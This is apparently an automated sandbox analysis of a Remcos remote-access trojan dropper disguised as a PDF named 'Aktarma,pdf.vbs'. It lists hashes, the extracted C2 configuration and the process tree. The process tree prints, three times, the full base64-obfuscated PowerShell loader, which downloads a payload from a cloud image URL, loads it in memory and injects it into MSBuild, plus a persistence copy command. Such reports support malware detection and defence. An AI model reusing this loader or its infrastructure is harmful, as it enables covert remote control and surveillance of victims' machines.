Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 15:27

General

  • Target

    Aktarma,pdf.vbs

  • Size

    150KB

  • MD5

    8c5cf018a9128cb2a9267ee3c4183a0c

  • SHA1

    c0e11113ae0360e55302ceecbc7a356ed732ca18

  • SHA256

    d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e

  • SHA512

    7a826b11dc1fb0ca727ac5044a620b3db4108994bb4cdd353abfa6abdb9e598523d560a191fb1e42473c803a628f7052914d1c9124f09bbfe5fcdbf6154e5ada

  • SSDEEP

    3072:NqHoOtSIAMD8oV8luoi9TKq/do5DvqHoOtSIAMD8oV8luoi9TKq/do50qHoOtSI2:NqpTD8LRiJKq/e57qpTD8LRiJKq/e50x

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg

Extracted

Family

remcos

Botnet

NEW

C2

rem.pushswroller.eu:23101

firewarzone.ydns.eu:23101

sun.drillmmcsnk.eu:23101

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmcghghyrtssxr-7RL1P2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Aktarma,pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\classers.vbs"
        3⤵
          PID:1324
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4524
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\twcs.vbs"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4152
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\ProgramData\classers.vbs
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2352
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:3900
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\ProgramData\classers.vbs
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $hamminesses = 'JGxpdGVyYWxpdHkgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcnOyRob2VjYWtlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY29nbm9tZW5zID0gJGhvZWNha2UuRG93bmxvYWREYXRhKCRsaXRlcmFsaXR5KTskY2FyYmFuaW9uID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNvZ25vbWVucyk7JHRlbGVwaG9uaWNhbGx5ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleGNsdXNvcnkgPSAnPDxCQVNFNjRfRU5EPj4nOyRzY29vcCA9ICRjYXJiYW5pb24uSW5kZXhPZigkdGVsZXBob25pY2FsbHkpOyRib3dsZWdnZWQgPSAkY2FyYmFuaW9uLkluZGV4T2YoJGV4Y2x1c29yeSk7JHNjb29wIC1nZSAwIC1hbmQgJGJvd2xlZ2dlZCAtZ3QgJHNjb29wOyRzY29vcCArPSAkdGVsZXBob25pY2FsbHkuTGVuZ3RoOyRiZXdoaXNrZXJlZCA9ICRib3dsZWdnZWQgLSAkc2Nvb3A7JGZlc3Rvb25lcnkgPSAkY2FyYmFuaW9uLlN1YnN0cmluZygkc2Nvb3AsICRiZXdoaXNrZXJlZCk7JHByb3RldXNlcyA9IC1qb2luICgkZmVzdG9vbmVyeS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZmVzdG9vbmVyeS5MZW5ndGgpXTskZWxlbWlzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkcHJvdGV1c2VzKTskc3BvcmFkaWMgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRlbGVtaXMpOyRkdXBwaW5nID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGR1cHBpbmcuSW52b2tlKCRudWxsLCBAKCcwL24xQ1pUL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICckc2NoZWR1bGVycycsICdNU0J1aWxkJywgJyRzY2hlZHVsZXJzJywnJHNjaGVkdWxlcnMnLCckc2NoZWR1bGVycycsJ1VSTCcsICdDOlxQcm9ncmFtRGF0YVwnLCdjbGFzc2VycycsJ3ZicycsJzEnLCcxJykpOw==';$stickhandled = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($hamminesses));Invoke-Expression $stickhandled
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1208
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
            PID:3000
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
              PID:1088

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\classers.vbs

          Filesize

          150KB

          MD5

          8c5cf018a9128cb2a9267ee3c4183a0c

          SHA1

          c0e11113ae0360e55302ceecbc7a356ed732ca18

          SHA256

          d3307a065f67a642d7425c6b9774b6a145a786d64997b977deb151c03e0caf7e

          SHA512

          7a826b11dc1fb0ca727ac5044a620b3db4108994bb4cdd353abfa6abdb9e598523d560a191fb1e42473c803a628f7052914d1c9124f09bbfe5fcdbf6154e5ada

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          f41839a3fe2888c8b3050197bc9a0a05

          SHA1

          0798941aaf7a53a11ea9ed589752890aee069729

          SHA256

          224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

          SHA512

          2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          6d69d6e56d616506fe5c6c51c13f52d6

          SHA1

          2aca68b6758e2d68098b79988a1713ce618e2aa6

          SHA256

          2c532460bdca7f1b05290218cdb346fc74854f3e2e647a59cba96e33f82a6911

          SHA512

          b2cefc322eac6eed95f850d37139ba68234f60338f6c2e336b9f1fb70c79ee502b6fc48c85c7fcdd5287967ac703a9c6514a5f5a6dc37871e2ae29e1a7366707

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          c16a2ee115b948beacdef3d713201241

          SHA1

          865e7a386f670fdb92acd28c00667806a921e932

          SHA256

          493da2560da57bd76e4be70ea5a5bd74a18a49667dd4e05f8ca71ff387ee644f

          SHA512

          8302ef3692f5eeedf50f3d0088fee379e1285cbe7fbb52007642d5636997f9a6bb132f0d319c54d8f07ffad524c16fdd5f3a6ce613250562b5c902c393ff0c67

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysqupbqh.adb.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\twcs.vbs

          Filesize

          374B

          MD5

          92323d5eafdd057f2602a2a0b5f5230e

          SHA1

          9498775850b22af3303ce67d042c7cf3925b396b

          SHA256

          52512978ad3bd19b5bbc6a332b2cc7635947c9f29979f746f406161ffb3ac34a

          SHA512

          268d4fe79242535278a9ca3396d1e39f9be88285a4ea01304bd39415728e07e5d9b8392a778732ab3b65ab050aa6aa6aadf6f4d1443b39605763fc380637bb5c

        • memory/2140-16-0x000001606BF20000-0x000001606C078000-memory.dmp

          Filesize

          1.3MB

        • memory/2140-14-0x00007FFD99B73000-0x00007FFD99B75000-memory.dmp

          Filesize

          8KB

        • memory/2140-15-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

          Filesize

          10.8MB

        • memory/2140-18-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

          Filesize

          10.8MB

        • memory/2140-13-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

          Filesize

          10.8MB

        • memory/2140-0-0x00007FFD99B73000-0x00007FFD99B75000-memory.dmp

          Filesize

          8KB

        • memory/2140-23-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

          Filesize

          10.8MB

        • memory/2140-12-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

          Filesize

          10.8MB

        • memory/2140-11-0x00007FFD99B70000-0x00007FFD9A631000-memory.dmp

          Filesize

          10.8MB

        • memory/2140-10-0x0000016042B80000-0x0000016042BA2000-memory.dmp

          Filesize

          136KB

        • memory/3900-87-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-94-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-104-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-103-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-102-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-101-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-99-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-98-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-96-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-97-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-95-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-92-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-91-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-89-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-88-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-69-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-70-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-73-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-74-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-75-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-76-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-77-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-78-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-80-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-81-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-82-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-84-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-85-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/3900-86-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-40-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-46-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-27-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-28-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-22-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-30-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-24-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-41-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-29-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-39-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-38-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-37-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-35-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-34-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-31-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB

        • memory/4524-19-0x0000000000400000-0x000000000047F000-memory.dmp

          Filesize

          508KB